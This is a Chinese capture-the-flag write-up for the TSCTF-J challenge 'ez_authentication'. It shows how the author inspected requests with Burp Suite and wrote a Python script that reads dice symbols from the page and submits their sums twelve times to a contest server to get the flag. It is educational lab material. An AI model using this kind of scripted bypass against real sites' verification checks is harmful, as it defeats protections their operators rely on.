【TSCTF-J】新生赛ez_authentication复现WP

ez_authentication

打开题目所给的网页

尝试点击获取（重置）验证问题

发现要输入骰子点数之和，输入十二次以后，弹出

发现果然没有这么简单点击确定后，点击获取（）重置）验证问题并且尝试用burpsuite抓包。
首先发现cookie中存储的phpseeid，猜测服务器是利用session来存储我们用了多长时间以及提交了多少次答案的，并且发现后面有传一个参数getproblem。之后尝试第一次输入并且抓包
发现在提交答案时我们需要传递一个answer的数据，接下来可以开始写脚本了：

import requests str=['⚀','⚁','⚂','⚃',"⚄",'⚅'] 
talk=requests.session() 
r=talk.post(url="http://120.53.107.60/authentication.php",data={'getproblem':'king_kb'})
for i in range(12): 
    sum=0 
    time=0 
    for j in range(6): 
        a=str[j] 
        if(a in r.text): 
            time+=1 
            sum+=j+1 
    if(time==1): 
        sum+=sum 
    r=talk.post(url="http://120.53.107.60/authentication.php", data={'answer':sum}) 
print(r.text) 

最后打开命令控制窗口运行代码

即可获得flag。